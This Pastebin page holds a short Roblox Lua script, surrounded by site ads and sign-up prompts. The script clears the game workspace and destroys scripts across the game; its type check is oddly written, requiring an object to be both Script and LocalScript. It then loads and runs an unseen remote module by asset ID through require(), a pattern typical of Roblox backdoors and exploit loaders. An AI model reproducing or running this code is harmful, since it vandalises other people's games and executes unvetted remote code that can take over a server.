Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- workspace:ClearAllChildren()
- for i,v in pairs(game:GetDescendants()) do
- if v:IsA("Script") and v:IsA("LocalScript") then
- v:Destroy()
- end
- end
- require(4589300307)()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement